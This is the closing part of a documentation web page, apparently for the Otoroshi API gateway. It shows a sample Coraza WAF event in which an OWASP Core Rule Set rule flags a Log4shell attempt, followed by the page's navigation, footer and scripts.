    &quot;file&quot; : &quot;@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf&quot;,
    &quot;msg&quot; : &quot;Potential Remote Command Execution: Log4j / Log4shell&quot;,
    &quot;severity&quot; : &quot;critical&quot;
  },
  &quot;raw&quot; : &quot;[client \&quot;127.0.0.1\&quot;] Coraza: Warning. Potential Remote Command Execution: Log4j / Log4shell [file \&quot;@owasp_crs/REQUEST-944-APPLICATION-ATTACK-JAVA.conf\&quot;] [line \&quot;10608\&quot;] [id \&quot;944150\&quot;] [rev \&quot;\&quot;] [msg \&quot;Potential Remote Command Execution: Log4j / Log4shell\&quot;] [data \&quot;\&quot;] [severity \&quot;critical\&quot;] [ver \&quot;OWASP_CRS/4.0.0-rc1\&quot;] [maturity \&quot;0\&quot;] [accuracy \&quot;0\&quot;] [tag \&quot;application-multi\&quot;] [tag \&quot;language-java\&quot;] [tag \&quot;platform-multi\&quot;] [tag \&quot;attack-rce\&quot;] [tag \&quot;OWASP_CRS\&quot;] [tag \&quot;capec/1000/152/137/6\&quot;] [tag \&quot;PCI/6.5.2\&quot;] [tag \&quot;paranoia-level/1\&quot;] [hostname \&quot;wouf.oto.tools\&quot;] [uri \&quot;/\&quot;] [unique_id \&quot;oNbisKlXWaCdXntaUpq\&quot;]\n&quot;,
}
</code></pre>
<div class="nav-next">
<p><strong>Next:</strong> <a href="../plugins/index.html">Otoroshi plugins</a></p>
</div>
</div>
<div class="large-3 show-for-large column" data-sticky-container>
<nav class="sidebar sticky" data-sticky data-anchor="docs" data-sticky-on="large">
<div class="page-nav">
<div class="nav-title">On this page:</div>
<div class="nav-toc">
<ul>
  <li><a href="../how-to-s/instantiate-waf-coraza.html#instantiate-a-waf-with-coraza" class="header">Instantiate a WAF with Coraza</a>
  <ul>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#before-you-start" class="header">Before you start</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#create-a-waf-configuration" class="header">Create a WAF configuration</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#configure-coraza-and-the-owasp-core-rule-set" class="header">Configure Coraza and the OWASP Core Rule Set</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#add-the-waf-plugin-on-your-route" class="header">Add the WAF plugin on your route</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#try-to-use-an-exploit-" class="header">Try to use an exploit ;)</a></li>
    <li><a href="../how-to-s/instantiate-waf-coraza.html#generated-events" class="header">Generated events</a></li>
  </ul></li>
</ul>
</div>
</div>
</nav>
</div>
</div>

</section>
</div>

</div>

<footer class="site-footer">

<section class="site-footer-nav">
<div class="expanded row">
<div class="small-12 large-offset-2 large-10 column">
<div class="row site-footer-content">

<div class="small-12 medium-4 large-3 text-center column">
<div class="nav-links">
<ul>
<!-- <li><a href="https://www.example.com/products/">Products</a> -->
</ul>
</div>
</div>

</div>
</div>
</div>
</section>

<section class="site-footer-base">
<div class="expanded row">
<div class="small-12 large-offset-2 large-10 column">
<div class="row site-footer-content">

<div class="small-12 text-center large-9 column">

<!--
<div class="copyright">
<span class="text">&copy; 2023</span>
<a href="https://www.example.com" class="logo">logo</a>
</div>
-->
</div>

</div>
</div>
</div>
</section>
</footer>

</div>
</div>
</div>
</body>

<script type="text/javascript" src="../lib/foundation/dist/foundation.min.js"></script>
<script type="text/javascript">jQuery(document).foundation();</script>
<script type="text/javascript" src="../js/magellan.js"></script>

<style type="text/css">@import "../lib/prettify/prettify.css";</style>
<script type="text/javascript" src="../lib/prettify/prettify.js"></script>
<script type="text/javascript" src="../lib/prettify/lang-scala.js"></script>
<script type="text/javascript">jQuery(function(){window.prettyPrint && prettyPrint()});</script>
<script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/elasticlunr/0.9.5/elasticlunr.js"></script>
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-112498312-1"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());

gtag('config', 'UA-112498312-1');
</script>
</html>




